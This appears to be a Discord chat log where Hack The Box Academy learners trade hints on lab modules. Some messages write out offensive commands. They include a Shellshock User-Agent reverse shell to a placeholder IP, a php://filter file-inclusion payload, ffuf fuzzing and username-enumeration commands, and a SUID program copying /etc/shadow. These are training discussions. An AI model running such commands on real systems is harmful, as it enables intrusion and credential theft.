#modules
Yw !
Hey, I'm trying to solve the labs in the File Inclusion Prevention section of the File Inclusion module. The 2nd question required me to edit the php.ini file to block system() for me to execute a payload.
I can't seem to find the place to block the system() command within that file. Any help?
In the Intro To Network Traffic Analysis module, Interrogating Network Traffic With Capture and Display Filters section:
What are the client and server port numbers used in the first full TCP three-way handshake?
I figured out the answer, however, I am confused: it says first full TCP three-way handshake, so shouldn't that be ||the server at 207.244.88.140? That specific server is the first one to acknowledge, but the correct answer isn't that server, not even the very first SYN flag, but the one right after, which is on the client's port 43806. Why?||
personally I use vim to search for the variable to block system(): /disable_
Has anyone made any progress on the web fuzzing skills assessment? I've tried a recursive fuzz and only found one directory. I can't do a subdomain search as I don't have the domain name, and I'm denied access to the one directory I've found. Any help on next steps will be appreciated
Feel free to dm me if you’re still stuck
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com/com/ I have a question: in this case, wouldn't it be necessary to add each subdomain to /etc/hosts and map it to the given target IP address?
In this case no
Inlanefreight.com is a live website
[It's a fake company]
oh, then it's accessible for everyone
Yep
ok ty bro, you always have the answer
And routed on the public internet
@fathom pendant are you a woman or a man?
Can I get help with the web fuzzing skill assessment
I am stuck after godeep fuzzing
I found 2 URLs but they are not working
But in the case of publicly accessible addresses, is the value of /etc/hosts also changed to change the value of the hosts header and find virtual hosts associated with an IP address?
You mean in the cases of docker containers or websites in general
Either way. The /etc/hosts file isn't changed dynamically
With ffuf you're manually manipulating the host header, which would be the header used when visiting a website
And in the case of not manipulating the header
Ffuf is literally just checking for 404/other indicators a site doesn't exist
I can't run the URL in my browser
Can't even curl it
Did you add the subdomain to your /etc/hosts?
Yes I did, it's still not working, I don't know why
I added both hidden and fuzzing but it didn't help
I need help with Web Attacks - Bypassing Basic Authentication. I'm trying to see the supported http headers.
The module suggested to use this syntax:
curl -i -X OPTIONS http://SERVER_IP:PORT/
However, I still can't see the allowed headers.
Are you trying https and not http?
the i needs to be uppercase
Yeah options doesn't work
http and it gives 404 not found
I don't know what to do at this point 😦
Do something else
Read the whole section
They give you some verbs
Hey, I'm doing the skill assessment section in the file inclusion module. I tried to get the base64 encoded string like in an earlier section of this module but I'm not able to get it
Any insights on this?
Thanks for the hint. Done the first part. 🙂
yoo, doing ADCS attacks, ESC10. Was anyone able to perform the attack from Windows? The module didn't cover that. I just want to make sure that it is possible to do the attack from a Windows machine
Any clue on the skill assessment for local file inclusion
Nope
how come?
[S]
[S.]
[.]
Is the full handshake
Synack is just saying that they acknowledge the synchronization of timing, MTU, and other such important datagram modules
but it's weird how tcpdump shows the ACK flag
alrighttt thanks man
. Is a common placeholder for ack
the docker containers are accessible for everyone, no?
much appreciated
Yes
I was just confused by your wording
With the docker containers, you're not gonna get anything by doing -u http://FUZZ.test.local
You need to manipulate the header
The header informs the server you're sending to, what resource location you're requesting
Most vhosts are set up in /var/www/<vhost>/
It worked on browser now
But now am clueless
Change anything? Otherwise chalk it up to something being dumb
The stoneedge one shows in the browser, almost there?
Changed the machine
It means you didn't go deep enough
Don't use any recursion limit
Oof
The flag will be given to you at the end of the road there
Thanks for the help
Can anyone help me with the skill assessment section in file inclusion? I tried to check the PHP configuration like in an earlier section in this module
But I am not getting any base64 encoded string
https://academy.hackthebox.com/module/51/section/1640 In this section on Python privilege escalation, why do we need to run a file with privilege escalation code when we already have sudo python permissions? Why not directly use the privilege escalation command?
Make sure you are looking for it properly
check with sudo -l which rights you really have
Because it won't look as suspicious
But also as payload said
Iirc it's php://filter/base64.encode/resource=[file]
You may also need to bypass some filters @limpid hemlock
I tried http server:port/index.php?page=php://filter/read=convert.base64-encode/resource=php.ini
Why are you trying to check the ini?
Why not the index?
Also note this goes by the cwd
php.ini might not be in the cwd of the webroot
Ya I tried the whole path like I did in the PHP wrapper module
@fathom pendant So both Docker and web pages in general work in a similar way in terms of how they treat headers to return a certain response, with the difference that web pages have those domains registered and by being on the authoritative servers of the domain providers where they are located, they can be found publicly through the DNS route?
PHP wrapper section in this same module. There I got a base64 encoded string to check if allow_url_include was possible
I was trying to solve this like that
Way
with the docker i mean the HTB ones
you don't need the read=
php://filter/convert.base64-encode/resource= is what's given in the module
sort of
at the end of the day
Ya I tried that, the index showed a hidden page
the Host Header tells the server where you're intending to look
and did you look for the hidden_page/index.php?
:)
Yup
You don't need to visit the hidden_page to find the hidden_index btw
Just set the php filter you've already identified resource= to the discovered dir/index
It's that easy
I'm a newbie, I don't quite understand everything
Any hints for the API attacks skill assessment?
What exactly is not working?
I think uploading the CV form for supplier. I just need a hint for that, I've been trying that all day but I can't solve it yet
Send me a DM so as not to spoil anything here. Tell me what exactly you did
Yes sir i will send you
I finished the AD Enumeration and Attacks skill assessment 2, but I'm kinda confused on the way we had to get domain admin.
Why would I need to run responder on the Windows host?
Wouldn't the multicast go to everyone on the network?
The LLMNR attack seemed way too targeted imo, but I guess it's hard to simulate it without going to all hosts. Maybe I don't understand it fully
responder is just listening for requests that are being sent; generally either from broadcast or multicast
the poisoning it does is basically saying "Hi i'm here, are you there?" which receives a response (i'm probably way underrepresenting it)
having trouble with this question in Footprinting/DNS: What is the FQDN of the host where the last octet ends with "x.x.x.203"?
subdomains of subdomains
yeah I understand that, but I felt kinda weird cause there was def a script only targeting specific IP addresses, which wouldn't make much sense irl, right?
what script?
:P responder doesn't run any major scripts aside from standing up services to pretend to be
I'm trying to brute force one particular subdomain, of which the last octet ends similarly, with dnsenum and the bash script, and getting nothing. And trying zone transfers with dig but it's like "host unreachable" 😵💫
I'm just guessing that there is a script on 2 of the workstations targeting 2 specific IP addresses
dnsenum is the way to go
make sure you use a fierce wordlist
it's not entirely unreasonable
¯\_(ツ)_/¯
okay, i'll keep trying with that then
like net use \\192.168.5.56\ every 2 mins
Think about which subdomain could be a zone. What would make sense if you were to manage it separately
that's just a script to make sure it's able to connect to a network share
that's not uncommon
and stay connected
yeah ik, just felt a bit too targeted I guess
not really? ¯\_(ツ)_/¯
wouldn't have thought of running responder on a compromised machine
i mean it's a tool you're taught to use in the module
so it's not out of the ordinary to try and use something
¯\_(ツ)_/¯
remember enumeration is iterative
you keep iterating your enumeration and exploitation until you reach the end of the rainbow
yeah
yeah I was phased out by that too as they presented responder as something that responds to multicast/broadcast requests, not unicast
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' In this command, wouldn't it be necessary to modify /etc/hosts? Just with the IP since the header is already being changed anyway?
but how will your machine resolve academy.htb?
in this instance you could either;
A: in /etc/hosts -- put the ip domain
B: in the request use the ip:port
your system still needs to know how to resolve the domain
the HOST header just tells the ip/domain you're looking at what resources you're specifically looking for
i.e. support, www, store
and the host says "oh yeah that's over here" and directs to the right resource
yo
no, I just copy pasted that. I was thinking something like this: ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://TargetIP:PORT/ -H 'Host: FUZZ.academy.htb'
but if you want to browse to the found subdomain, you'll need it in your hosts file
yes that will make it simpler, thank you
I'm trying to answer "Windows Attacks & Defense / PKI - ESC1 / question 2". I'm pretty sure I have the correct answer but it keeps on giving me wrong answer. The answer I'm trying to provide is "12/19/2022". Any help is appreciated
I'm on the password attacks module, "Passwd, Shadow & Opasswd", but the will password has refused to work. Any help, thanks
http.server
hey, I'm new to cybersecurity and I just started htp sites to start, and I faced a problem with the linux fundamentals part where it asks me to ssh to htp-student. When I type the password it says permission denied. I used both the browser room and set up the vpn one and generated multiple ids from the exam, and the problem is the same
do you mean htb-student?
yep
because you typed "htp" twice in that sentence. I'd start by making sure you've got that character correct for the username.
i type
ssh htp-student@ip
you are confusing "p" with "b".
wait
Hi guys and gals, I am currently busy with the DNS part of the footprinting module and would like some advice. When I run the dig command, I receive a "Warning: recursion requested but not available". Is this part of the practical or is this an indication that I went wrong with the configuration?
need more info
also with dig you need to specify the server, since inlanefreight.htb isn't a publicly routed domain
can I hit you with a dm of the command and the response I receive?
yes gotcha
any box or workstation you will ssh/rdp into will not be connected to the outside world
keeps disconnecting every minute
oki got it
/timeout:9000
also you don't necessarily need to rdp into it; ssh works just fine
To use tools like wireshark I have to but anyways thanks for helping
1: wireshark isn't required 2: wireshark can be run from the CLI iirc
Almost through Attacking Common Apps
You're making good progress, good luck 🫡
I’m at the level of tomcat cgi 😅
It's not that bad
Imo don't be afraid to pull up the guide for the retired machine "fatty" for the thick client section that deals with Java
Because that section was like pulling teeth trying to understand it and the "why" behind some of it
(Because its not explained)
you are talking about cgi or another section
read my statement carefully, lol, but not CGI
every other section was easy (relatively)
the thick client comes out of NOWHERE
ah I see, I'm not yet there, but I understand lol. Ya, just hearing "java" makes the neurons start to blur
I can't imagine how hard it would be for someone like marcie to watch me go through these modules. I often find the answer and not realize it, and proceed to spend another hour frustratingly searching for the answer that i've already found.
been there, done that, got the t-shirt
❤️ i feel the struggle
you also have to realize when i'm helping others, i'm helping through the lens of hindsight
CPTS t-shirt soon
i sure as shit didn't get through all the modules so far without some level of skill issue of my own
it's why sometimes my hints refer specifically to what tripped me up when I did it
shiiit, the footprinting module with the hard lab... I completely forgot about the one service... which would have saved me so much time
some of the exercises in Injection Attacks are brutal if you fail the knowledge check
If we have CPTS send us a shirt?
it's a separate package you order
$20 + shipping
(depending where you are, shipping may be the cost of the exam itself)
you can order it in the My Certificates page after you get your cert
Experience the pride of holding your certification and elevate your achievements even further by owning a tangible symbol of your success with Hack The Box Certification Box which contains: Physical Certification with your name on it A Frame for the Certification A Congratulation Folder with 2 Stickers and 1 Pin at
took a nap, came back and got it in like two seconds
it's good, $20. When I have it I'll frame this fucking piece of paper because it made me fall several times
also thank you @acoustic owl for giving me more direction on how to think about this
That looks good!
LMFAO i completely guessed for q1/2 of the skill assessment 1 as the target was spawning
i can't even rn
brug..
it was a total shot in the dark for 1 then it was an educated guess for 2
CBBH, I think I'll pass it after the CPTS, I'll see according to my objectives
CBBH is fun. def recommend
okok, according to my friend who got the CPTS we are around 60% of the CBBH, so yes it's worth it.
What was your experience before taking these exams
3 is crazy
my major is cybersecurity with a specific focus on network and endpoint security
it's a great foundation for bug bounty/web pentesting
with the new modules replacing the old ones, the quality of the content will significantly increase
here with the module name, section name, and what you're stuck on alongside what you've tried
being vague only hurts your cause
It helps to (without spoiling the environment) state what you've tried so far
you can also utilize the search feature in discord to see if others have had the same question
https://academy.hackthebox.com/achievement/667914/113 it has been achieved Victory is mine
Penetration Testers can come across various applications, such as Content Management Systems, custom web applications, internal portals used by developers and sysadmins, and more. It's common to find the same applications across many different environments. While an application may not be vulnerable in one environment, it may be misconfigured or...
gj marcie 🙂
I've been wanting to get into bug bounty and it's perfect timing 😉
that looks hot my god 
nah just...not a lot to it tbh
the second assessment was the juiciest
also might throw some feedback for it, since it looks like the third assessment was lifted from a retired machine (logged in and saw root.txt...) regarding giving a bit more clear instructions on where to find certain things like the .dll (though not necessary to search) you're meant to look through
even doing it slightly differently it's still a tad underwhelming (but that's my 2 cents, and i'll probably formulate it better somehow someway for /feedback)
ok I see, I'm not yet there, but I'll take note in case it can help me
Do you mean like, reset the progress you have made?
No
I swear that needs to be pinned 
Curious why you'd want to reset your progress TBH, but I guess that question has also been asked a lot 😅
Well it's probably due to when modules get updated, the answers don't wipe, and they often don't match the new expected answers
Fair point
Well, I saw that a module got updated, did the new sections and went ahead to finish the skill assessment. I think it's bugged, the new questions got the past answers and did not match with the new ones
^
🙂
Exactly
There's a firefox extension in #resources-tools that someone's made that pseudo does that
Looking at that really triggered my OCD
Oh really?? Cool, thanks
Also, I think that a “reset” button that wipes all the answers but doesn’t wipe the overall progress on the dashboard would be great, you know, just to refresh the knowledge, sometimes I take a look back at a module but feel something is missing because I can’t input the answer again and get that dopamine rush
It is
But there's no point in resubmitting the same answer
Well, I've passed on the feedback RulOpsSec, I imagine the team have heard it before and likely have had some discussions regarding it, but chucked it over the fence just in case
Really appreciate it!
G0blin bullying the dev team 
Likely though it's a backend issue
Database storage for the answer key or some such
Do you have an example module / section RulOpsSec?
Bully? Nooo... provide feedback
🙈
The information gathering - web edition module
Which was temporarily renamed to Web Recon
Exactly, that one
Do you recall the extension name?
It's literally posted there earlier today
Idk if it's on the ff store
Gotcha, appreciate the help
guys, there's a thing I don't understand about the reverse shell curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/IP/7777 0>&1' http://10.129.205.27/cgi-bin/access.cgi here. Does it make reference to something like log poisoning (because we attack the User-Agent) as LFI, or is it really the bash environment that is vulnerable according to its version, from which it is possible to have a reverse shell? For this section: https://academy.hackthebox.com/module/113/section/2166
I'd advise reading up the section a bit @marsh echo - you'll find what the reasoning behind this request is 🙂
Yeah the reasoning is actually given (shellshock)
yes, maybe I misunderstood :/ but I got the shell
If so, have a re-read of that section
Solidify your understanding before moving on, it's not a race 🙂
of course 😉
Read up on the actual vulnerability being abused here; shellshock
yes I saw, thank you, I will reread it before sleeping. But I told myself that since the user agent is being attacked it was the same kind of attack as log poisoning with LFI (because I remember this), but I have gone too far in my reflection lol
Looks like for apache it's abusing mod_cgi / mod_cgid
thx I understand better
guys, who has some articles about ssrf vuln and how to exploit it in diff ways?
ahah I think we're going to take it at the same time (well, I think you'll take it a few days before). Btw, how do you plan to revise?
well gotta go back and refactor my notes and such anyway
so
¯\_(ツ)_/¯
early on i was pretty lazy
then i got less lazy
then lazy again
...
it's not consistent 
ahhah I understand you, but it was when I had finished AD that I did a lot of hanging around and then I went back to work. But I made the mistake of doing my notes badly before AD, so I'm thinking of redoing my notes from now on.
it's not bad to go back over notes
see what makes sense and see what doesn't
as the mindset you had when initially writing things down may be different now
idk why i’m having so much trouble with footprinting. FOOTPRINTING.
but it's the home stretch, you can't let go
that's exactly it!
I look back at some of my highschool hand written notes and am like "wtf was I on?" 
SMTP. Can't get user. I've used the wordlist from resources manually with smtp-enum-user and with metasploit, and with the metasploit wordlist in metasploit. And I just get nothing?
it’s working because i’m getting output. just no matches.
tried resetting the lab a couple of times.
smtp can be a slow service
and i’m stubborn as hell trying not to ask for help lol
Damn
also using the right method as well can be helpful
Cpts soon
i'd have to be sure i can have 10 days of no major life disruptions first
How long you been study ?
lol true
a little over a year; but i had a good 4-5 months where I couldn't really study
no internet and such
but that's exactly it, I went back over one of my notes to help someone and even I didn't understand my notes, there wasn't enough precision. It forced me to redo the exercise to understand better and it took 5 minutes
should i be using nse script instead? or just brute-forcing manually in telnet? lol
10 days kind of long ngl
Specifically if you adult
not manually
god no not manually
and nse scripting is a pain in the ass
use the smtp-user-enum tool
Marcie
You have job ?
I applied for that job 8 times, the one I'm working right now
💀
Pay is not bad
You from USA correct ?
smtp-user-enum -U /usr/share/wordlists/footprinting-wordlist.tx -t <Lab IP> -m 150 -M VRFY is what I've been using
and auxiliary/smtp/smtp_enum or whatever in metasploit.
metasploit was like, user found: nobody
i forget which is the timeout waiting
okay. i’ll slap that flag on there lol
either -W 25 or -w
you can always do smtp-user-enum -h
to see the command flags
How often do I need to re-download the VPN packs?
hm weird
why?
Ran into a couple issues today and yesterday with the VPN
(if you're using the in-browser pwnbox, the answer is never)
change vpn regions then ¯\_(ツ)_/¯
yes
so you had a tun0 ip if you ran ip a
yes
¯\_(ツ)_/¯
do you have the pwnbox on while also being connected to the vpn at the same time? if so that causes problems.
nope, opened the pwn box after running into issue
have you recently changed regions on the vpn
^
if you do head academy-regular.ovpn do you see [edge-]us-academy-2
yup
Just re-downloaded the pack and it works now
I just redownloaded it last night too though
¯\_(ツ)_/¯
Password Attacks - Credentials Hunting in Linux.
I already SSH'd into Kira, and have moved laZagne.py.
But when I type "python3 laZagne.py all" on the host I get:
```
Traceback (most recent call last):
  File "laZagne.py", line 17, in <module>
    from lazagne.config.write_output import write_in_file, StandardOutput
ModuleNotFoundError: No module named 'lazagne'
```
Any help?
well, it says you're missing the lazagne module. you could try installing it.
you can't run the script if it's missing an import. the host you're on doesn't have the lazagne module installed
oh you're remoted into a box so probably can't install it
probably not
Yeah, I did that. And apparently I'm not the only one running into this problem.
i don't really recall that specific module, but it's probably safe to say it doesn't require lazagne to move forward if it doesn't work on the victim box.
Hmm
Can I DM someone? I think I am close to the right answer
which is why the terminal output was banned from this Discord server
just articulate your problem here
I just solved it on my own never mind
It’s not
It was a false positive with another rule
How do tools like ffuf prevent their IP from being blocked when sending so many requests from the same address?
It depends
They don't do really anything to prevent getting blocked
But you can limit your rates and such so as to attempt to not trigger any WAFs
I'm so close, yet so lost. At the last question that's not the bonus question for the Pass the Hash (PtH) module in password attacks. I pass the hash attack with user julio and the respective hash, then I set up an nc listener in powershell, then I go to my pwnbox and get the output from the reverse shell website. This is where I am confused. Do I set up another powershell tab and let the nc run? I did this and ran the big Invoke command, and it says "Command executed with process ID 4708 on DC01", but then that's where I'm stuck, I don't see a reverse shell pop up
ummmm, am I supposed to set up the netcat listener on my pwnbox, or within julio's rdp?
netcat is the listener that catches the reverse shell
it's receiving the incoming connection
righttt, so it would make sense to set that up in my pwnbox, right??
correct, the revshell powershell script will initiate the connection
In this case no
ahh yeah if there's a pivot host you'll need to tunnel through that
ya i'm seeing that, "To get a reverse shell, we need to start our listener using Netcat on our Windows machine"
Set it up in the host you're rdp on, C:\tools should have nc64.exe
@fathom pendant During an engagement, what do you use to take notes? I have tried plain text and cherrytree, however I have not adapted to those
I use obsidian for my note taking but I'm not in this line of work (yet)
i also use obsidian, it's very nice
right, so I rdp hash attack into julio, set up the netcat listener in powershell in julio's rdp, I go to the reverse shell website and put in my target ip and get the script shell, then I go back to julio and... this is where I'm confused
You don't put the target ip in the revshell
You put the ip that would match the interface that's calling out to the dc
(ipconfig)
172.16.x.x I believe
ohhh, so I put julio's ip in the reverse shell?
I'll try it with Obsidian, I've used it for years but not for this kind of things. Now that I think about it, Excalidraw or the integrated canvas could be a good option.
thank u
172.16.1.5
Specifically the ip that's on the same subnet
Yes
that is a private address?
Indeed
whoa
Often the internal network of the private machines are on the 172.16.0.0/24 subnet
so am I supposed to have one powershell running netcat with julio, and a separate powershell running the reverse shell command within julio also?
or do I need to be running netcat in cmd, and run the reverse shell command in powershell?
I've been waiting for a long time. What's the problem?
asking me?
happened to me once, I started another machine in a different section, terminated it, then went back to the previous one that wasn't working and started that
somehow it worked then
yeah
Okay, but I don't think I started the other machines.
I'm having such trouble trying to get this to work. I'm not quite clear on what the point of the reverse shell website is, maybe that's where I'm having the problem. Is it just so I can get the script so I can copy/paste into the reverse shell command?
yes
ok so then that shouldn't be the problem for me then
then u run it as the command in wmiexec
wmi is probably one of the last method i'd try
or one of the last at least. try smbexec or something instead.
did you load the invoke-hash module first ?
me posting this here worked, I'm missing the quotation at the end 🤣 😭
lol
gg
true, just going by the example shown
i hate everything right now
I got the flag! Man, I feel like every module in this password attacks is a struggle.
feels good. you're learning it sounds like to me.
I sure am. I really want that progress bar to be moving so much faster than it is.
Facts. I think I will be more proud to pass this certification, than every certification combined through WGU.
i do wish i could just implant knowledge like johnny mnemonic though
just completing the course, not even the exam, is an accomplishment
100% agree
why can't I extend my instance any longer
For the mini module Using Splunk applications the sysmon add on they suggested has been archived and no longer supported. is there another one i should be using instead?
there's a maximum time limit you can't just extend it forever. you can terminate it and respawn it.
hey, can I ask some questions regarding Pass the Ticket (PtT) from Linux as I am not good with chisel
The enumeration lasts longer than the time that the pwnbox lasts
i don't recall any module like that
Yeah... which VPN are you on, and which module / section @plucky hollow ?
Wym?
the Skills Assessment of web fuzzing / Attacking Web Applications with Ffuf, the issue is that analyzing everything recursively takes a lot of time
ffuf is pretty fast, it doesn't take hours to do that at all.. I think it was like less than 20 or 10 mins for each thing
If it can’t be found within a few minutes, you’re usually on the wrong path
What is the maximum number of simultaneous threads that you recommend I use with ffuf?
i don't think i changed the threads when i did it
you have over 4300 errors
so you're probably not doing something right
I was replying to tomrider36, not you, sorry
generally one of the following will fix connection issues. you can do all of them too and it'll probably fix it. terminate the target. disconnect from the vpn -> download a fresh vpn file. restart your host machine. reconnect to the new vpn file, spawn the target, wait 3-5 mins after the target spawns.
in my screenshots from ffuf i don't have any errors
ffuf -w /opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:47681/FUZZ -recursion -e .php7 -v
hey, I have one question in Pass the Ticket from Linux. The question is: Transfer Julio's ccache file from LINUX01 to your attack host. Follow the example to use chisel and proxychains to connect via evil-winrm from your attack host to MS01 and DC01. Mark DONE when finished.
here I get the linux01 flag, how can I transfer the ccache file of julio
?
i like scp
Heyy
I have a doubt. I am learning ethical hacking and I am new in this field, and I have a Windows PC. Should I replace my Windows with Linux or use Linux in VirtualBox?? Please suggestions @everyone
either works, but being practical a vm is probably better
?? from linux01
Ohkk, thank you, are you an ethical hacker too?
do you have hackthebox account?
I don't have the premium membership
idk about that particular module. I thought you were talking about a transfer to a linux box, I like scp for that. If you're transferring to windows I like the /drive parameter for xfreerdp.
no bruh, that's not the case here, I can access linux01 through smb
@fathom pendant big boy help me
what? you asked how to transfer a file.
thats the question
your prompt says to transfer from linux to your attack box. isn't your attack box linux?
yeah i answered it, scp for linux transfers
ya but I can access the user linux01 through smbclient
Can please someone help me here too ? 😭
so?
with what
With some guide for hacking
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
try htb and get a vm on virtualbox and learn some linux, u'll have to get used to the shell
I know Linux very well, and from where can I learn shell???
it just means cmdline
Ik that
if u know then u can start the cpts module for pentesting
Cpts??
Read the link above
@storm elk where?
ye the cpts pathway
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
This ⬆️
Thanku 🥹
you can ask that question without the screen shot, and posting something like that is against the rules unless it's a tier 0 module
This is your command?
```
svc_workstations@inlanefreight.htb@10.129.17.154's password:
scp: remote open "/tmp/krb5cc_647401106_HRJDux": Permission denied
```
yes
your problem says permission denied, so a permission issue
sudo
Are you on the first question tom?
the error suggests svc_workstations doesn't have permissions required to read or access the file on the remote machine
Ah ok
test .php .phps
archive / courses .php .phps /index.php/courses/index.php
faculty / courses .php .phps .php7 /index.php/courses/index.php
can i dm you ? in that way i can explain more
nvm.. tom, let me DM, take it out of here
Ok
i'm actually just about to go to bed
Bro can anyone give me HTB subscription 😭
ok @ocean night you??
they have giveaways and you can win them in #giveaways
yeah you have to go through the #welcome section first before you can access other discord areas
Can you use an http server?
Connection refused
i am kinda confused here, i have done the prev one easily, now the additional question says: Transfer Julio's ccache file from LINUX01 to your attack host. Follow the example to use chisel and proxychains to connect via evil-winrm from your attack host to MS01 and DC01. Mark DONE when finished.
here from `LINUX01`
Ohk
```
root@linux01:/home/svc_workstations@inlanefreight.htb# id
uid=0(root) gid=0(root) groups=0(root)
```
here i am root now and for accessing LINUX01 i can use smbclient
```
root@linux01:/home/svc_workstations@inlanefreight.htb# smbclient //dc01/linux01 -k
Try "help" to get a list of possible commands.
smb: \>
```
but i have no idea how i can transfer julio's ccache to my local machine
i don't get it, are you tunneling or something?
I’m trying rn
there are many ways to transfer files
Did you use chisel and proxychains?
smb share, python ftp/http server, scp, powershell
i think it's the next step? like first i have to download the ccache file
i have executed chisel from rdp but in order to add the file to the env variable i need julio's ccache
yeah i used scp for that part
it's the answer i gave you before, the user svc_workstations doesn't have permission to grab that file. you need to grant permissions.
once they have permissions, use scp to xfer
like how can i grant permission like i have to grant permission for that specific file or what?
yeah, the user doesn't have permissions to touch that file. you're root on the box, you can modify the file permissions.
ohh okok thanks man !
Hey, I'm having trouble in the File Upload Attacks module, Upload Exploitation section. I created a webshell, uploaded it, downloaded it and ran cmd in that url but nothing's happening
https://academy.hackthebox.com/module/113/section/2154 Q:What credentials were found for the local database instance while debugging the octopus_checker binary?
how to solve it?
But it's the every hackers thingy. 
Had some technical difficulties but thank god I got through it
Not much support for plugins imo
Yep, but you deployed it now right?
Yes but just for testing purposes, I'm trying to just make my technical writing skills better
Keep it up, let me know when you publish your first blog.
Any help
#welcome Get yourself verified first.
Need screenshots of the situation and what you did
Yee ofc
DM.
if a root user creates a file cmd
cp /etc/shadow /tmp/.
and then sets the suid bit, so if you run this using another non-root user, it says permission denied
but if the root user compiles this:
```c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
    /* Binary is installed with the SUID bit set and owned by root, so the
       effective UID is already 0; setuid(0)/setgid(0) make the real IDs root
       as well before the shell spawned by system() runs. */
    setuid(0);
    setgid(0);
    system("cp /etc/shadow /tmp/.");
    return 0;
}
```
and sets suid bit, and if run by another user then it works, how? and why?
I am doing the Linux Fundamentals and logged in with ssh as htb-student.
But when I do the ls command it doesn't show me anything
You might be in an empty directory
Try ls -ail
This command can show hidden directory
That start w .
Yup 😉
but it shouldn't be empty.
What is the path to the htb-student's mail?
I found some forums with the solution but when I ls i see nothing
probably because there are only hidden files inside your home dir
Move through those directory
There is a well known command
ls -a will show everything
I can't; if I try to cd into it, it says there is no such directory
you have to find the dir some other way
you can try checking your environment variables, maybe there's one for mail dir
Tbh I'd just use a find command 💀
try submitting that for the answer

It worked.
Kinda crazy though since they didn't really explain it
much appreciated for the help
pwd only showed /home/htb-student
if you ssh in, you'll be in your home dir, so i'm not sure how you'd find it using pwd
that dir would be for a user named mail..
Sleep well haha
Hi, is there any one finished the Active Directory Trust Attacks Module?
I always get Access Denied when gathering the flag.txt file after a successful attack.
Why is the Introduction to NTA module's Wireshark section so confusing? In Guided Lab and Packet Inception most of the time I was wasting time on Live host whereas the task was in the resource file or vice versa.
Hello house pls I need help on task 2 of Intro To Assembly Language Skill Assessment
The above server simulates a vulnerable server that we can run our shellcodes on. Optimize 'flag.s' for shellcoding and get it under 50 bytes, then send the shellcode to get the flag
I have optimised the asm code below 50 bytes as said and modified the code to be null-byte free, yet when I paste the payload to the server I get "failed to run shellcode"
This is frustrating me, pls any hint, even if I can dm the person with my modified asm code
Section: Web Fuzzing
Skills Assessment
I fuzzed the given ip and found /admin/, then I fuzzed /admin and found a few more pages but they say access denied, but I am clueless for the next step, can anyone help?
I also found panel.php but when I browse to that website, it says "Invalid parameter, please ensure accessID is set correctly"
Broken Authentication Skills assessment
trying to get a valid username: There are 2 regexps, one is "Invalid credentials." for a valid user and an invalid pass, the second regexp is "Unknown username or password." for both an invalid user and an invalid pass
This is the command i used:
||ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -u http://83.136.252.88:42502/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=Password1234" -fr "Unknown username or password." -mr "Invalid credentials."||
ran it 2 to 3 times, still couldn't get a user, what am i missing here?
Hey, have you completed web fuzzing?
Nevermind, just got a hit for the user, should've just waited a few more mins before asking lol😂
Nope
@stiff socket
Hey guys
Im stuck on skill assessment for broken authentication
can someone give me a nudge for otp?
Can someone give me a hint with a problem of resolving the question in the Web Enumeration module (Getting Started). The hint from HTB says "Everything you need to login is given to you"... but I tried looking at the source page, no login is saved. I need some help, but no direct solution, please.
Take a look at the module, it explains how you can bypass things
In which section?
Getting Started Module - Pentesting Basics - Web Enumeration
Check the module again. It will show you how you can obtain credentials
Hey, if u dont mind, can u help me with skill assessment web fuzzing?
Haven't done that module but, isn't that just hinting you to use the ||accessID parameter to the GET or POST to your || request
i have some clue
What exactly is the problem? What is not working?
i tried to fuzz accessID alone as well
i fuzzed the given target, got /admin/panel.php
but when i visit, it says make sure the accessID is set correctly
I did. The bruteforce isn't working, for it asks you to log in again after 3 attempts.
You have already used bruteforce and the module shows other things. Not everything can be forced with bruteforce.
Yesterday I gave a try for a random created target from HTB with nmap. I found that the target's port, which was listed on HTB, was not hosting the web server. I found that this was another port... and after that I got stuck getting the login data. But today, with a new target, I can't even access the web panel, as I don't get the right port for the web server.
what does it say?
The website tells you what you need to do 😉
|| fuzz the accessID ||
i did
nothing so far. fuzzed both GET and POST methods.
If the value is correct, you will get further
Your filter is wrong
Use Content-Length
just Content-Length?
If I remember correctly, each parameter returns the code 200. So you cannot filter by it
Yes, because each parameter returns the status code 200. So you have to filter according to a different criterion
used this and too many responses
...
Size
Look at the most common size response being thrown at you
Then [f]ilter by [s]ize
-fs you mean?
Try first. Ask questions later
In this field you have to be willing to take a suggestion, and extract the meaningful info and run with it
Is someone having trouble with the machine of Active Directory Skills Assessment Part II 2?
I restarted it several times, terminated and started again. I changed to different VPN regions.
But as soon as I login to the machine and do a simple ls command, it freezes forever
Change vpn regions
Wait at least 5-10 minutes after spawning to ensure all services have been launched
done: from EU (low load) to US (low load) and picking the recommended
Startmachine 120 min
I went to lunch and it was 90 min, with the same slow
Reach out to support then
ok thks
Hello .
Someone for the second question of the "Introduction to Binary Fuzzing module"
<<What is the name of the vulnerable variable that ASan has identified and what line does it exist on? Answer by copying the exact ASan output, 'variable_name' (line 123) >>
Thanks in advance
couldn't decode the session and i intercepted responses but nothing no.
there are no interesting parameters as far as i know that i can manipulate
Look again in the module. It will show you what you need to do.
there were interesting stuff actually .
can someone suggest which wordlist I should use to get the password? tried using rockyou but it's working very slow, not more than 2 req/sec
I'd recommend a custom wordlist based off a policy, if that is the correct skills assessment.
Is there someone that can shed some light for me in the Whitebox attacks module, section type juggling - authentication bypass ?
thanks man, i forgot that step
@crisp remnant how can you make hash() return null
Yea this is exactly the thing that i am wondering..... no matter how and what i try it always returns a hash....
there is a way... use ||array()||
hmm i already tried that... i am testing with a simple code, but even an empty array ([]) is being hashed...
Hello, I am still very new to the Hack The Box stuff and I am having this issue with the command. I am very confused because it was working when I did the previous module. I'm unsure of what the issue is, would anyone be able to help explain?
Try restarting the lab
Refrain from giving direct answers/code
If you feel it necessary take to dms
It worked fine for me from what I recall
mhmmm, here is my codechain:
